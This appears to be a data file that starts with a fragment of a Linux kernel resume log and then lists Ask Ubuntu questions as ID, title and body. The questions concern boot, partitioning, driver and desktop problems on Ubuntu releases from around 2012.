: [ 63633.745329 ] ata_piix 0000:00:1f.1 : setting latency timer to 64 jan 22 23:20:23 core kernel : [ 63633.745882 ] ata2 : port disabled . ignoring . jan 22 23:20:23 core kernel : [ 63633.745956 ] ehci_hcd 0000:00:1d.7 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.746008 ] ahci 0000:00:1f.2 : setting latency timer to 64 jan 22 23:20:23 core kernel : [ 63633.746199 ] ehci_hcd 0000:00:1d.7 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.746212 ] ehci_hcd 0000:00:1d.7 : pci int d - > gsi 19 ( level , low ) - > irq 19 jan 22 23:20:23 core kernel : [ 63633.746227 ] ehci_hcd 0000:00:1d.7 : setting latency timer to 64 jan 22 23:20:23 core kernel : [ 63633.746338 ] sdhci-pci 0000:05:00.2 : pci int c - > gsi 18 ( level , low ) - > irq 18 jan 22 23:20:23 core kernel : [ 63633.746342 ] sdhci-pci 0000:05:00.2 : will use dma mode even though hw does n't fully claim to support it . jan 22 23:20:23 core kernel : [ 63633.747785 ] sd 2:0:0:0 : [ sda ] starting disk jan 22 23:20:23 core kernel : [ 63633.832121 ] firewire_core : skipped bus generations , destroying all nodes jan 22 23:20:23 core kernel : [ 63633.889113 ] pm : resume of drv : usb dev : usb6 complete after 141.460 msecs jan 22 23:20:23 core kernel : [ 63633.889140 ] pm : resume of drv : usb dev : usb5 complete after 141.537 msecs jan 22 23:20:23 core kernel : [ 63633.889148 ] pm : resume of drv : hub dev:6-0:1.0 complete after 141.462 msecs jan 22 23:20:23 core kernel : [ 63633.889155 ] pm : resume of drv : hub dev:5-0:1.0 complete after 141.523 msecs jan 22 23:20:23 core kernel : [ 63633.889168 ] pm : resume of drv : usb dev : usb4 complete after 141.615 msecs jan 22 23:20:23 core kernel : [ 63633.889193 ] pm : resume of drv : hub dev:4-0:1.0 complete after 141.606 msecs jan 22 23:20:23 core kernel : [ 63633.992079 ] pm : resume of drv : usb dev : usb3 complete after 244.577 msecs jan 22 23:20:23 core kernel : [ 63633.992113 ] pm : resume of drv : hub dev:3-0:1.0 complete after 244.581 msecs jan 22 23:20:23 core kernel : [ 63633.992122 ] pm : resume of drv : dev : ep_81 complete after 187.314 msecs jan 22 23:20:23 core kernel : [ 63634.039150 ] pm : resume of drv : e1000e dev:0000:00:19.0 complete after 296.470 msecs jan 22 23:20:23 core kernel : [ 63634.064094 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) jan 22 23:20:23 core kernel : [ 63634.066121 ] ata3.00 : acpi cmd ef/02:00:00:00:00 : a0 ( set features ) succeeded jan 22 23:20:23 core kernel : [ 63634.066127 ] ata3.00 : acpi cmd f5/00:00:00:00:00 : a0 ( security freeze lock ) filtered out jan 22 23:20:23 core kernel : [ 63634.069470 ] ata3.00 : acpi cmd ef/02:00:00:00:00 : a0 ( set features ) succeeded jan 22 23:20:23 core kernel : [ 63634.069477 ] ata3.00 : acpi cmd f5/00:00:00:00:00 : a0 ( security freeze lock ) filtered out jan 22 23:20:23 core kernel : [ 63634.069743 ] ata3.00 : configured for udma/133 jan 22 23:20:23 core kernel : [ 63634.084201 ] pm : resume of drv : sd dev:2:0:0:0 complete after 336.415 msecs jan 22 23:20:23 core kernel : [ 63634.084235 ] pm : resume of drv : scsi_device dev:2:0:0:0 complete after 336.404 msecs jan 22 23:20:23 core kernel : [ 63634.104079 ] usb 3-2 : reset full speed usb device using uhci_hcd and address 2 jan 22 23:20:23 core kernel : [ 63634.252254 ] pm : resume of drv : usb dev:3-2 complete after 504.549 msecs jan 22 23:20:23 core kernel : [ 63634.252282 ] pm : resume of drv : usb dev:3-2:1.0 complete after 504.555 msecs jan 22 23:20:23 core kernel : [ 63634.252310 ] pm : resume of drv : dev : ep_81 complete after 256.976 msecs jan 22 23:20:23 core kernel : [ 63634.332127 ] firewire_core : rediscovered device fw0 jan 22 23:20:23 core kernel : [ 63634.392089 ] pm : resume of drv : pcmcia_socket dev : pcmcia_socket0 complete after 139.679 msecs jan 22 23:20:23 core kernel : [ 63634.395190 ] pm : resume of devices complete after 658.465 msecs jan 22 23:20:23 core kernel : [ 63634.395351 ] pm : resume devices took 0.656 seconds jan 22 23:20:23 core kernel : [ 63634.395379 ] pm : finishing wakeup . jan 22 23:20:23 core kernel : [ 63634.395381 ] restarting tasks ... done . jan 22 23:20:23 core kernel : [ 63634.408933 ] video lnxvideo:00 : restoring backlight state jan 22 23:20:23 core kernel : [ 63634.444168 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id jan 22 23:20:23 core kernel : [ 63634.484061 ] skipping edid probe due to cached edid jan 22 23:20:23 core kernel : [ 63634.860368 ] e1000e 0000:00:19.0 : irq 42 for msi/msi-x jan 22 23:20:23 core kernel : [ 63634.916220 ] e1000e 0000:00:19.0 : irq 42 for msi/msi-x jan 22 23:20:23 core kernel : [ 63634.916565 ] addrconf ( netdev_up ) : eth0 : link is not ready jan 22 23:20:24 core kernel : [ 63635.170345 ] addrconf ( netdev_up ) : wlan0 : link is not ready jan 22 23:20:27 core kernel : [ 63639.044664 ] wlan0 : authenticate with 20 : cf:30 : c6:3c:7d ( try 1 ) jan 22 23:20:27 core kernel : [ 63639.053951 ] wlan0 : authenticated jan 22 23:20:27 core kernel : [ 63639.054028 ] wlan0 : associate with 20 : cf:30 : c6:3c:7d ( try 1 ) jan 22 23:20:27 core kernel : [ 63639.056430 ] wlan0 : rx assocresp from 20 : cf:30 : c6:3c:7d ( capab=0x411 status=0 aid=4 ) jan 22 23:20:27 core kernel : [ 63639.056438 ] wlan0 : associated jan 22 23:20:28 core kernel : [ 63639.084890 ] addrconf ( netdev_change ) : wlan0 : link becomes ready jan 22 23:20:37 core kernel : [ 63649.649091 ] wlan0 : no ipv6 routers present jan 23 00:01:37 core kernel : [ 66109.346319 ] iwlagn 0000:03:00.0 : activate a non driver active station id 0 addr 20 : cf:30 : c6:3c:7d jan 23 00:01:37 core kernel : [ 66109.360197 ] wlan0 : deauthenticating from 20 : cf:30 : c6:3c:7d by local choice ( reason=3 ) jan 23 00:01:37 core kernel : [ 66109.374509 ] cfg80211 : all devices are disconnected , going to restore regulatory settings jan 23 00:01:37 core kernel : [ 66109.374520 ] cfg80211 : restoring regulatory settings jan 23 00:01:37 core kernel : [ 66109.374527 ] cfg80211 : calling crda to update world regulatory domain jan 23 00:01:37 core kernel : [ 66109.408315 ] cfg80211 : world regulatory domain updated : jan 23 00:01:37 core kernel : [ 66109.408319 ] ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) jan 23 00:01:37 core kernel : [ 66109.408323 ] ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 23 00:01:37 core kernel : [ 66109.408328 ] ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jan 23 00:01:37 core kernel : [ 66109.408331 ] ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jan 23 00:01:37 core kernel : [ 66109.408335 ] ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 23 00:01:37 core kernel : [ 66109.408338 ] ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm )
98230	after double-clicking a script on the desktop , show output in a terminal	i am trying to make a demo virtual machine . on the desktop , i have a script foo.sh and it outputs stdout to foo.log ( e.g . with some command > foo.log ) when i double click on the script , it generates the foo.log . however , i would like for the script to also present the stdout in real time ( e.g . using tail -f foo.log ) . how can i do this ? do i need to pipe the output to two places ?
98232	what is a suitable place to ask for help when getting ppa build errors ?	i am trying to work on some ppa recipes . as i am getting build errors i am seeking help from the community in order move forward . where can i find a suitable forum for getting help ?
98233	e320 claims there is no os	i 've just bought my shiny new lenovo edge e320 , without an os ( though it was claimed to contain a dos ) . after now 4 re-installations of ubuntu , i am desperate . when i pull the usb stick off and reboot , the laptop tries to boot from network . it does that , because it does n't see the os on the hdd . every time it fails with the message `` no operating system . '' i 've set the `` boot '' flag on all the partitions , checked the boot-order , set the hdd to top , re-parted and reset all the flags , re-installed ubuntu , and i have no idea what else to try . please help me , i 've saved up for an exciting new laptop and i ca n't use it .
98235	how to uninstall the experimental hud ppa ?	i installed hud via these two steps : sudo add-apt-repository ppa : unity-team/hud sudo apt-get update & & sudo apt-get dist-upgrade i tested it , but now i have problems entering applications menus , e.g . by pressing alt+e for edit menu . so i want to uninstall and so i removed the ppa from the sources . i did this from the settings menu of the update manager . i think i need to remove the app by doing sudo apt-get remove xxx . but i do n't know how it is called ... hud-cli is n't there .
98238	how do i report bugs about hud ?	i 've found a couple of bugs in hud , such as when you use it , the window loses focus afterwards . but i ca n't find a bug tracker for it ?
98243	how to customise window decoration whilst using compiz on xubuntu ?	i have installed compiz on xubuntu 11.10 with sudo apt-get install compiz compizconfig-settings-manager compiz -- replace ccp & in the process the xfce window decoration theme is overridden by that of compiz ( gtk ) which uses the adwaita theme instead of the greybird theme . since gtk is doing window decoration , i can not change it back using the xfce settings . i just need compiz for scale and window switch and i would like to return window decoration to xfce ( xfwm4 ) or to be able to change the gtk window decoration theme . how can i do that ? i have found part of the ( workaround ) answer already : download greybird gtk theme install theme ( here is where i failed i think ) use dconf-editor to change the gtk theme in org.gnome.desktop.interface the problem really at stage 2 is where do i place the theme ? i tried in ~/.themes/ and then changed the value of gtk-theme in the editor to greybird . but i saw no change .
98244	how do i uninstall and remove ubuntu 11.10 ?	i installed ubuntu 11.10 after creating a demo disk from an .iso file . it offered to create a dual boot version where ubuntu coexists with my preinstalled windows xp from hp . both systems work fine side by side . everything worked ok but after evaluating it i need to revert to my original configuration of windows xp only . there does not appear to be any info on removing/uninstalling ubuntu when one does not have a microsoft xp os disk ... but has only a recovery disk on my main hard drive . can anyone suggest the steps that i need to follow or where i might find instructions ? i figure all we need to do is stop ubuntu from hijacking the boot process and then i could delete the partitions its on . many thanks .
98253	how can i change my monitor resolution to a higher one ?	i just installed ubuntu on my computer after that i instaled the recommended driver for nvidia geforce fx 5600xt and display resolution is 640x320 how can i change it to a higher resolution , i really would appreciate if somebody could help me , thanks
98255	lirc not running , yet the remote can control the desktop . through what ?	i am trying to configure my remote . the good news , is that it `` just worked '' . meaning : i plugged it in , ran the gnome-lirc-properties and now i can control some parts of my desktop with it . it seems , though , that it is not lirc handling it . i have killed lircd . it does not show under ps : ps faux | grep ir # shows a few processes , like firefox , but nothing like lirc ( d ) , irw , irrecord etc . the device is still active thought : sudo cat /dev/lirc0 pressing buttons on my remote make it print all sorts of strings . pressing buttons on my remote actually control gnome/unity/desktop . e.g . volume up and down make the volume go up and down , mute works , the `` windows-button '' fires up banshee and so on . what is reading out my remote ? and how can i configure that ?
98256	mysql administrator asks for password every time	i have instlaled mysql administrator and it works fine , except one annoying thing . every time i select a table and click 'edit table data ' from context menu , it prompts for password . any idea how to fix this ?
98263	linux kernel 3.0+ phased older systems out ?	like many others using ubuntu and various other distributions , has the linux kernel officially phased out certain systems ? i 'm using a hp 6700 amd turion 64 laptop that worked perfectly with lucid 10.04 . however starting with 10.10 and up it seems that certain core issues gradually appear : ricoh built-in card reader shows corrupted files in nautilus . i use a dslr for photography and video so i consider this major problem . win 7 shows them perfectly . in 11.10 ( and apparently 12.04 ) bluetooth just does not work with receiving files . gui device list is corrupted in options panel also . a `` downgrade '' to kernel 2.6.39 fixed that issue . no hdmi audio for nvidia 8400gs ( not a major issue to me but still , it works on win 7 ) . i 've search for various forum and bug listings with either no responses from canonical or coders and zero solutions ( i figured the kernel drop myself ) . it seems kinda irresponsible to just drop system support that worked perfect recently just out of assumptions of someone getting a new system every few months . backwards compatibility is what linux developers and supporters constantly touts as it being excellent in . unfortunately this is n't the case .
98270	ethernet and wireless will not work : ubuntu 10.04 32-bit on a gateway notebook	i have a gateway notebook and installed vista on it ( successfully ) , but can not get my new ubuntu 10.4 installation to connect with the internet wirelessly . i can get a list of routers ( on the triangular button ) and it tries its hardest to connect , but without result . the `` additional drivers '' installed with the ubuntu 10.4 system -- located in `` applications '' -- is corrupted so is of no help . i tried , in vain to search for a linux driver on the internet , but could find none . please , help me connect to the internet with the proper driver . ( zeller @ live.com )
98271	trouble setting up a usb-serial hp laserjet 6mp printer	i have an old hp laserjet 6mp that i am trying to use with an ieee 1284 - > usb cable . i plug it in and turn it on before booting into kubuntu and i get some likely candidates in /dev/ : parport0 , parport1 , lp0 , lp1 following advice i 've seen elsewhere on the web , i have tried setting the uri to all combinations of [ parallel , serial , usb ] : /dev/ [ parport0 , parport1 , lp0 , lp1 ] but have n't been able to get a test page to print ever . any ideas on how else i can trouble shoot this ?
98272	what does `` error reading login count from pmvarrun '' mean ?	i have the above mentioned error in my /var/log/auth.log file and just try to figure out if this is a harmelss statement . as far as i understand does pmvarrun tells the system how many active session ( e.g . logins ) a user has on the system . full output of auth.log jan 24 17:44:42 p835 lightdm : pam_unix ( lightdm : session ) : session opened for user lightdm by ( uid=0 ) jan 24 17:44:42 p835 lightdm : pam_ck_connector ( lightdm : session ) : nox11 mode , ignoring pam_tty :0 jan 24 17:44:49 p835 lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` user '' jan 24 17:44:51 p835 dbus [ 1289 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.31 '' ( uid=104 pid=1882 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.17 '' ( uid=0 pid=1561 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) jan 24 17:45:04 p835 lightdm : pam_unix ( lightdm : session ) : session closed for user lightdm jan 24 17:45:04 p835 lightdm : pam_mount ( pam_mount.c:691 ) : received order to close things jan 24 17:45:04 p835 lightdm : pam_mount ( pam_mount.c:693 ) : no volumes to umount jan 24 17:45:04 p835 lightdm : command : 'pmvarrun ' '-u ' 'user ' '-o ' '-1 ' jan 24 17:45:04 p835 lightdm : pam_mount ( misc.c:38 ) : set_myuid < pre > : ( ruid/rgid=0/0 , e=0/0 ) jan 24 17:45:04 p835 lightdm : pam_mount ( misc.c:38 ) : set_myuid < post > : ( ruid/rgid=0/0 , e=0/0 ) jan 24 17:45:04 p835 lightdm : pam_mount ( pam_mount.c:438 ) : error reading login count from pmvarrun jan 24 17:45:04 p835 lightdm : pam_mount ( pam_mount.c:728 ) : pam_mount execution complete jan 24 17:45:08 p835 lightdm : pam_unix ( lightdm : session ) : session opened for user user by ( uid=0 ) jan 24 17:45:08 p835 lightdm : pam_ck_connector ( lightdm : session ) : nox11 mode , ignoring pam_tty :0 jan 24 17:45:25 p835 polkitd ( authority=local ) : registered authentication agent for unix-session : /org/freedesktop/consolekit/session2 ( system bus name :1.54 [ /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 ] , object path /org/gnome/policykit1/authenticationagent , locale en_us.utf-8 ) jan 24 17:45:47 p835 dbus [ 1289 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.59 '' ( uid=1000 pid=4748 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.17 '' ( uid=0 pid=1561 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) thanks for any help
98273	how can i select an open window in gnome shell 's activities view using the keyboard ?	when i press the super key in gnome shell ( ubuntu 11.10 ) i see all open windows . how can i select one of the open windows with the keyboard ?
98275	which folders to restore from full system backup after harddisk change ?	which folders do i need to restore from a backup of my ubuntu 11.10 installation to get the original state back except the harddisk change ? details : i installed ubuntu 11.10 on my internal ssd-disk ( sata,60gb ) and used my sofware-raid5 array ( 3 internal disks , sata ) only for backups . i backed up the whole ssd-disk with back-in-time ( root ) . now my ssd-disk failed and i plugged in a new disk ( 120gb , sata ) instead . then i installed ubuntu from a live-cd again . then i installed `` mdadm '' and `` backintime '' from software center . my raid5 array was n't shown in nautilus and disk utilities , but i brought it back typing `` sudo mdadm -- assemble -- scan '' in a terminal window and mounting it in nautilus afterwards . backintime was n't showing the snapshots until i changed the host name to the old name . backintime now shows me following folders/files to restore : bin boot cdrom dev etc home lib lib32 lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var ! initrd.img vmlinuz initrd.img.old vmlinuz.old then on my first try i restored every folder ( which was a kind of silly , because it was deleting all the content of the excluded folder like `` sys '' instead of ignoring it ) . after rebooting , i got always the error `` error : no such device : 3b45 ... '' while booting and ubuntu desktop did n't come up . then on my second try after reinstalling ubuntu i restored everything except following folders : /dev /proc /sys /media /mnt /cdrom but i still got the same error . grub comes up , but then before showing the desktop it gets stuck with the same error message `` error : no such device : 3b45 ... '' . so i installed ubuntu from live-cd again . now the important question for my third try is : which file or folder must i exclude to get my machine running ? that means all my personal data and installed programs and ubuntu-updates back as it was like before , except that i now have got a different hard disk . my back-in-time-settings of my last backup : include `` \ '' , and excludes following folders/files : .gvfs /home//.mozilla/firefox/.default/cache /home//.mozilla/firefox/.default/offlinecache /home/*/.local/share/trash /dev/* /proc/* /tmp/* /sys/* /media/* /mnt/* /var/cache/* .cache* /lost+found/* /var/tmp/* /cdrom/* [ cc ] ache* .thumbnails* [ tt ] rash* .backup *~ /root/ubuntu one .dropbox* ( it seems this list is faulty and incomplete , but i am just starting to learn ubuntu . next time i will delete the `` /* '' at the end of the ignored directories . more improvement suggestions of this list are welcome ) .
98276	how do i help uploading ( printer ) drivers to the ubuntu repositories ?	i have a new printer ( a brother mfc-9970cdw , so a pretty new one at the hour of me writing ) and i tried to connect to it through the `` printing '' utility . but at the step where i am supposed to select the driver , my own printer is not listed in there . this is not a problem for me , since i can manually download the driver from the manufacturer site . moreover it is a gplv2 software . nonetheless , is there a way for me to help the community by uploading any proprietary driver to ubuntu ? i have read this ask ubuntu question `` how to get my software into ubuntu ? '' but it does n't answer my concern , since the driver i am talking about is actually not a product of my own work .
98278	window list on my gnome panel does n't respect all of my icon theme	i 'm running window list on my gnome-panel and a there are some apps that do respect my icon theme and some that do n't . gnome-terminal does , firefox does not . nautilus does , gvim does not . ubuntu 10.0 , 32bit , elementary theme , faenza icons installed from ppa
98285	what changes does unity 's hud offer	in 12.04 there will be many changes to the application menus . for what i have heard hud will make some of this changes but what does it actually offer for newcomers and old users of ubuntu .
98291	looking for iptables and ufw readily available , the best proven rules	ok i am up with ubuntu finally , and liked the distro ! particularly ufw , synaptic and software manager . as i am pretty blind newbie to linux , i need some help securing ubuntu desktop . i 've gone through documentation but barely understand any , went all over my head ! ! ! can any ubuntu pro show or post ready available best proven rules for iptables and ufw fo avoid various types of hacks and net-attacks ? thanks in advance lubu
98294	ubuntu server 11.10 boot , white terminal with garbled black text	i just installed ubuntu server 11.10 and the install went fine . this system is running on an intel pentium ii board with onboard graphics . however when i try to boot into ubuntu i get a white terminal with garbled black text . i have tried various grub 'fixes ' as googling the issue seemed to suggest it was a res or grub related issue . i can not ssh in so the issue does affect linux as well . i have had no luck with anything thus far and am at my wits end . this was my first ubuntu excursion as my friend told me it was better for servers than centos because it was easier ... not so much ... . does anyone have any ideas as to what the issue could be ? when answering bear in mind i am an ubuntu noob and linux novice . as of 1/26/12 i have tried to add the console=ttyl line to the /etc/default/grub and run update-grub . this results in the line in the boot parameters that normally reads : linux /vmlunz-3.0.0-12-generic-pae root=/dev/mapper/dev-root rovt.handoff=7 now reads : linux /vmlunz-3.0.0-12-generic-pae root=/dev/mapper/dev-root ro console=ttyl vt.handoff=7 this does not work . is there anyway to have console=ttyl inserted on a line by itself ? i am at my wits ends , thanks for all your help , speed
98296	fresh install of 12.04 on release	my current version of 11.10 is plagued with shutdown/reboot bugs that are basically unfixable because of something i did months ago . coupled with totem errors , malfunctioning recent files ... etc . when 12.04 comes out at the end of april , i have decided to stick with ubuntu instead of switching to mac . my filesystem has the following on different partitions : / ( swap ) /home /home/videos /home/television when i burn and run the install disc of 12.04 , do i just pick the previous partions out in the advanced mode and then choose to reformat root / to perform a clean install ? i do n't care about the application packages i lose , i can easily download them again .
98301	can a sempron processor play hd video ?	i want to assemble a low-cost media player computer . i wonder if a sempron processor will be able to play high definition 1080p videos , of course on ubuntu , xbmc or ubuntu tv , when available . will this be enough ? the other choice is a bluray player and a usb hard drive .
98302	bluetooth connection works but preferences shows not connected	my nokia n810 is bluetooth paired with ubuntu desktop and successfully transfers files . the ubuntu bluetooth indicator shows the n810 . when i bring up bluetooth preferences it shows desktop bluetooth on and visible but when selecting any paired device it 's shown as connection off and wo n't let be slide the switch to on . i 'm aware that bluetooth devices only connect with one paired partner at a time and insured that 's not the issue . i 've also paired with a bluetooth gps receiver which displays the same the same preferences issue . i know it works with my my n810 but have been unable to get foxtrorgps on ubuntu to use the gps and ca n't determine if it works with ubuntu even if preferences refuses to see the connection in any fashion .
98309	where is the mythbuntu control center diskless server option	mythbuntu 's control center used to have an option to setup a diskless server . i 've got it going manually but i wanted to know ; is the option to make diskless systems coming back to mythbuntu-control-center ? where can i download the development release of mythbuntu-control-center to help make this happen ?
98310	grub2 parameters , how to edit them	i need to add a parameter to the grub entry for ubuntu . console=ttyl how do i set this ? i know how to do it manually for each boot but how do i set it to be automatically passed as a param ? i am using grub 2 and ubuntu 11.10 thanks , speed
98311	ubuntu install 11.10 does n't recognize windows 7 installation with new hdd	replaced my crashed hdd with a seagate 2tb sata ( bought from a company who pulled it from a working computer , os unknown ) and did a fresh install of windows 7 . windows shows 100mb boot partition ( bootable ntfs ) and 200gb windows partition ( ntfs ) , the rest is unallocated . win7 disk management says the partitioning type is master boot record . win7 boots and runs fine . ubuntu 11.10 install procedes to allocate drive space screen and should say this computer currently has windows 7 on it . what would you like to do ? instead , it says something like install does n't detect any existing os on this computer . when i click on something else , the partition table shows only the unallocated space of 1.8tb . ubuntu disk utility says partitioning : master boot record , but gparted live says partition table : gpt . it was my original intention to have the windows boot partition and application partition , then install ubuntu 11.10 using boot , root , swap , and home partitions , and maybe another partition just for data ( mostly photos ) . currently , i would be happy if i could just get ubuntu installed along with win7 . i am aware of the mbr limits of 3 primary partitions and 1 extended partition . i suspect that my new hdd is partitioned for gpt and that is why ubuntu ca n't see the win7 installation . am i on the right track ? i was going to use windows disk management to convert gpt to mbr but i only have the one drive on my amd-64 mini-computer and it says i have to empty the drive of all partitions before i can access the convert command . and i ca n't find any bootable software that would allow me to do that conversion . here is the result of sudo fdisk -l : ubuntu @ ubuntu : ~ $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 2000.4 gb , 2000398934016 bytes 224 heads , 19 sectors/track , 918004 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd4a68c18 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 419637247 209715200 7 hpfs/ntfs/exfat ubuntu @ ubuntu : ~ $ keep in mind that i 'm a definite newbie to screwing around with the inner workings of ubuntu . i previously had ubuntu 10.04 running with vista and i do n't remember even having to partition anything that was n't automatic in the install . thanks for taking a look here . my win7 is running fine but i miss my ubuntu .
98314	mount fat32 filesystem as /home during installation ?	setup in ubuntu 11.10 installation gives me this message while in advanced partitioning : '' the file system type fat32 can not be mounted on /home , because it is not a fully-functional unix file system . please choose a different file system , such as ext2 . '' is there a way to force the use of the fat32 partition so i can share it with windows , but also using it as home ?
98315	grub multiboot wont start 2nd windows installation	i 'm new to linux - please help i havent found an answer in the forums yet i have 2 hdds the bios reports the hdds in the following order : third ide master = 200gb drive fourth ide master = 1tb drive the last 2 entries of grub show : - drive - 200gb - microsoft windows xp ... ... .. on /dev/sda1 - windows nt/200/xp ( loader ) ( on /dev/sdb1 ) windows xp ( sp3 ) is installed on the 1st partition of both drives ubuntu ( latest ) is installed on the 2nd partition on the 1tb drive ubuntu loads fine from the 2nd partition of the 1tb drive from the grub menu windows xp loads fine from the 1st partition on the 200gb drive from the grub menu windows xp fails to load from the 1st partition on the 1tb drive from the grub menu nb : this partition still contains all the windows files when i select `` windows nt/200/xp ( loader ) ( on /dev/sdb1 ) '' from grub i get : a black screen for a few seconds then it goes back to the grub selection menu the default ubuntu ( install alongside ) config did not work so i used the advanced partition manager to get it installed - [ ubuntu works fine ] i selected `` windows nt/200/xp ( loader ) ( on /dev/sdb1 ) '' as part of the install process : i was just trying things to get it installed . how do i change the grub entry `` windows nt/200/xp ( loader ) ( on /dev/sdb1 ) '' to point to the correct location to boot windows xp on the 1st partition of the 1tb drive ? thank for any help
98319	correct installation and configuration of openjdk and r	i am relatively new to ubuntu so i wont know a lot of commands that probably became standard to a lot of you guys . i am trying to set up r and with it the necessary java dependencies to install e.g . jgr , rjava , etc . i read through quite a few instructions to do that but somehow i must have done sth wrong . here is the state of r and java : r -- version r version 2.14.1 ( 2011-12-22 ) copyright ( c ) 2011 the r foundation for statistical computing isbn 3-900051-07-0 platform : x86_64-pc-linux-gnu ( 64-bit ) java -version java version `` 1.6.0_23 '' openjdk runtime environment ( icedtea6 1.11pre ) ( 6b23~pre11-0ubuntu1.11.10.1 ) openjdk 64-bit server vm ( build 20.0-b11 , mixed mode ) r cmd javareconf java interpreter : /usr/bin/java java version : 1.6.0_23 java home path : /usr/lib/jvm/java-6-openjdk/jre java compiler : /usr/bin/javac java headers gen. : /usr/bin/javah java archive tool : /usr/bin/jar java library path : /usr/lib/jvm/java-6-openjdk/jre/lib/amd64/server : /usr/lib/jvm/java-6-openjdk/jre/lib/amd64 : /usr/lib/jvm/java-6-openjdk/jre/../lib/amd64 : /usr/java/packages/lib/amd64 : /usr/lib/jni : /lib : /usr/lib jni linker flags : -l/usr/lib/jvm/java-6-openjdk/jre/lib/amd64/server -l/usr/lib/jvm/java-6-openjdk/jre/lib/amd64 -l/usr/lib/jvm/java-6-openjdk/jre/../lib/amd64 -l/usr/java/packages/lib/amd64 -l/usr/lib/jni -l/lib -l/usr/lib -ljvm jni cpp flags : but when i try to install 'javagd ' in r , which is a dependency for jgr i get : ... checking java support in r ... present : interpreter : '/usr/bin/java' cpp flags : '' java libs : '-l/usr/lib/jvm/java-6-openjdk/jre/lib/amd64/server -l/usr/lib/jvm/java-6-openjdk/jre/lib/amd64 -l/usr/lib/jvm/java-6-openjdk/jre/../lib/amd64 -l/usr/java/packages/lib/amd64 -l/usr/lib/jni -l/lib -l/usr/lib -ljvm' configure : error : one or more java configuration variables are not set . make sure r is configured with full java support ( including jdk ) . run r cmd javareconf as root to add java support to r. ... any help would be greatly appreciated . thanks !
98323	how does `` accounts service '' work with lightdm ?	i have added two users using the command useradd but they do no show up in the lightdm/unity-greeter login screen . so there is no way to graphically login for them . it seems accounts service ( whatever that is ) is not reading them in . how can i reload that or cause them to appear in the login window ? i am a fedora user so i have no clue about ubuntu and how it does these things . thanks .
98324	problem with 10.04 start at my notebook after updating	at my notebook i use ubuntu 10.04 after regular updating i have got version ... 37 and yesterday i update the system to the version ... 38 every day i switch off my notebook and for the last 2 version i have got the following problem : when i switch on the notebook i must type the password and very often my keyboard is not active now ! i.e . i can not type password click restart does not help - the same situation when i shout down it - it helps but yesterday i had to do it 5 times before i could type password how can i solve this problem ?
98325	can not change screen brightness on my lenovo z 570 ?	i am not able to change the screen brightness on lenovo z570 . even the function keys for the brightness are also not working . any idea ?
98338	what do i need for `` passwords & encryption keys application '' ?	i installed a command line system for ubuntu 11.10 then installed gnome shell and other applications over . i enabled auto login but is always asked to unlock login keyring . i need to use `` passwords & encryption keys '' application to fix that how can i stop being prompted to unlock the 'default ' keyring on boot ? . but i ca n't access the app , possibly because i do n't have it installed ?
98340	how can i split a single partition into three when it already has tons of data ?	i 'm considering splitting a single partition into three as per rinzwind 's suggestion . that is , p1 for ubuntu 11.10 ( which i currently have installed ) , p2 for ubuntu 12.04 ( or the prerelease ) , and p3 for data . the single partition currently has lots of media stored on it . would it make sense to : free up enough space for p1 + p2 create them ( reduce the existing partition and keep the data there - the existing partition becomes p3 ) install the relevant releases of ubuntu on p1 and p2 ( how ? ) delete everything that is n't in /home from p3 create /home subfolders on p1 and p2 and symlink them to subfolders on p3 or is there an easier/better way to do it ?
98342	how can i enable hardware acceleration for an ati radeon hd5450	i have followed the steps from the links is my ati graphics card supported in ubuntu ? and how can i enable hardware acceleration for an ati radeon hd ? my vainfo output is libva : libva version 0.32.0 xlib : extension `` xfree86-dri '' missing on display `` :0.0 '' . libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/dri/fglrx_drv_video.so libva : va_opendriver ( ) returns 0 vainfo : va api version : 0.32 vainfo : driver version : splitted-desktop systems xvba backend for va-api - 0.7.8 vainfo : supported profile and entrypoints vaprofileh264high : vaentrypointvld vaprofilevc1advanced : vaentrypointvld which is the same as in the post above but i have choppy video even playing 720p . graghics in system info display this driver vesa : park experience standard the output of sudo glxinfo | grep -i direct is : direct rendering : yes gl_amd_multi_draw_indirect , gl_amd_name_gen_delete , gl_arb_draw_indirect , gl_arb_draw_instanced , gl_ext_copy_buffer , gl_ext_copy_texture , gl_ext_direct_state_access , the output of sudo lspci | grep vga is : 01:00.0 vga compatible controller : ati technologies inc manhattan [ mobility radeon hd 5430 series ]
98343	difference between gtk theme and gnome shell theme ?	i 'm using gnome shell and i 'd like to know what a gtk theme changes that a gnome shell theme does n't .
